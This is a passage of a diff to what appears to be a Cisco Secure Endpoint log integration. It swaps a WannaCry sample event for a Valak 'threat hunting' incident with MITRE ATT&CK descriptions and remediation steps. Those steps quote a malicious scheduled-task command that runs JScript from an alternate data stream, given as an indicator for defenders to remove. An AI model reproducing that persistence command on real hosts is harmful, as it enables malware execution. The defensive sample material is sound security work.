added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}",
+        "kind": "alert"
     },
     "cisco": {
-        "amp": {
+        "secure_endpoint": {
             "computer": {
                 "active": true,
                 "network_addresses": [
                     {
-                        "mac": "53:74:31:cb:37:50",
+                        "mac": "87:c2:d9:a2:8c:74",
                         "ip": "10.10.10.10"
                     }
                 ],
                 "connector_guid": "test_connector_guid",
                 "external_ip": "8.8.8.8"
             },
-            "file": {
-                "disposition": "Malicious",
-                "identity": {}
+            "threat_hunting": {
+                "severity": "critical",
+                "incident_title": "Valak Variant",
+                "incident_id": 416,
+                "incident_end_time": "2020-06-18T11:12:50.000Z",
+                "incident_start_time": "2021-01-15T10:48:08.000Z",
+                "incident_summary": "The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.",
+                "incident_remediation": "We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n    - Review all activity performed by the user\r\n    - Upload any suspicious files to ThreatGrid for analysis\r\n    - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n    - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.",
+                "incident_report_guid": "6e5292d5-248c-49dc-839d-201bcba64562",
+                "incident_hunt_guid": "4bdbaf20-020f-4bb5-9da9-585da0e07817"
             },
             "connector_guid": "test_connector_guid",
             "related": {
                 "mac": [
-                    "53:74:31:cb:37:50"
+                    "87:c2:d9:a2:8c:74"
                 ]
             },
-            "group_guids": [
-                "test_group_guid"
+            "techniques": [
+                {
+                    "mitre_name": "technique",
+                    "tactics_names": "Collection",
+                    "system_requirements": "Privileges to access certain files and directories",
+                    "permissions": "",
+                    "name": "Data from Local System",
+                    "description": "\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\n\n\u003cp\u003eAdversaries may do this using a \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\"https://attack.mitre.org/software/S0106\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\"https://attack.mitre.org/techniques/T1119\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\n",
+                    "external_id": "T1005",
+                    "mitre_url": "https://attack.mitre.org/techniques/T1005",
+                    "data_sources": "File monitoring, Process monitoring, Process command-line parameters",
+                    "platforms": "Linux, macOS, Windows"
+                },
+                {
+                    "mitre_name": "technique",
+                    "tactics_names": "Execution, Persistence, Privilege Escalation",
+                    "permissions": "Administrator, SYSTEM, User",
+                    "name": "Scheduled Task/Job",
+                    "description": "\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\n",
+                    "external_id": "T1053",
+                    "mitre_url": "https://attack.mitre.org/techniques/T1053",
+                    "data_sources": "File monitoring, Process monitoring, Process command-line parameters, Windows event logs",
+                    "platforms": "Windows, Linux, macOS"
+                },
+                {
+                    "mitre_name": "technique",
+                    "tactics_names": "Defense Evasion, Execution",
+                    "permissions": "User",
+                    "name": "Scripting",
+                    "description": "\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\"https://attack.mitre.org/techniques/T1086\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\n\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\"https://attack.mitre.org/techniques/T1193\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\"https://attack.mitre.org/techniques/T1203\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\n\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\n",
+                    "external_id": "T1064",
+                    "mitre_url": "https://attack.mitre.org/techniques/T1064",
+                    "data_sources": "Process monitoring, File monitoring, Process command-line parameters",
+                    "platforms": "Linux, macOS, Windows"
+                }
             ],
-            "error": {
-                "description": "Delete pending",
-                "error_code": 3221225558
-            },
-            "detection_id": "6419229327140847663",
-            "event_type_id": 2164260880
+            "tactics": [
+                {
+                    "name": "Defense Evasion",
+                    "description": "\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\n\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\n",
+                    "mitre_name": "tactic",
+                    "external_id": "TA0005",
+                    "mitre_url": "https://attack.mitre.org/tactics/TA0005"
+                }
+            ],
+            "event_type_id": 1107296344
         }
     },
     "tags": [
diff --git a/packages/cisco_secure_endpoint/docs/README.md b/packages/cisco_secure_endpoint/docs/README.md
index fdb900ec77c..211831fcb08 100644
--- a/packages/cisco_secure_endpoint/docs/README.md
+++ b/packages/cisco_secure_endpoint/docs/README.md
@@ -15,21 +15,13 @@ An example event for `log` looks as following:
 
 ```json
 {
-    "@timestamp": "2021-01-14T14:41:05.000Z",
-    "file": {
-        "hash": {
-            "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
-        }
-    },
+    "@timestamp": "2021-01-15T11:59:52.000Z",
     "ecs": {
-        "version": "1.11.0"
+        "version": "1.12.0"
     },
     "related": {
         "hosts": [
-            "Demo_WannaCry_Ransomware"
-        ],
-        "hash": [
-            "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+            "Demo_Threat_Hunting"
         ],
         "ip": [
             "8.8.8.8",
@@ -37,52 +29,122 @@ An example event for `log` looks as following:
         ]
     },
     "host": {
-        "name": "Demo_WannaCry_Ransomware",
-        "hostname": "Demo_WannaCry_Ransomware"
+        "name": "Demo_Threat_Hunting",
+        "hostname": "Demo_Threat_Hunting"
+    },
+    "threat": {
+        "technique": {
+            "reference": [
+                "https://attack.mitre.org/techniques/T1005",
+                "https://attack.mitre.org/techniques/T1053",
+                "https://attack.mitre.org/techniques/T1064"
+            ],
+            "name": [
+                "Data from Local System",
+                "Scheduled Task/Job",
+                "Scripting"
+            ],
+            "id": [
+                "T1005",
+                "T1053",
+                "T1064"
+            ]
+        },
+        "tactic": {
+            "reference": [
+                "https://attack.mitre.org/tactics/TA0005"
+            ],
+            "name": [
+                "Defense Evasion"
+            ],
+            "id": [
+                "TA0005"
+            ]
+        }
     },
     "event": {
-        "severity": 2,
-        "ingested": "2021-09-12T17:32:10.094015339Z",
-        "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
-        "kind": "alert",
-        "action": "Quarantine Failure",
-        "id": "6419229331435815000",
-        "category": [
-            "malware"
-        ]
+        "severity": 4,
+        "action": "SecureX Threat Hunting Incident",
+        "ingested": "2021-09-27T00:41:08.619280442Z",
+        "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n    - Review all activity performed by the user\\r\\n    - Upload any suspicious files to ThreatGrid for analysis\\r\\n    - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n    - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 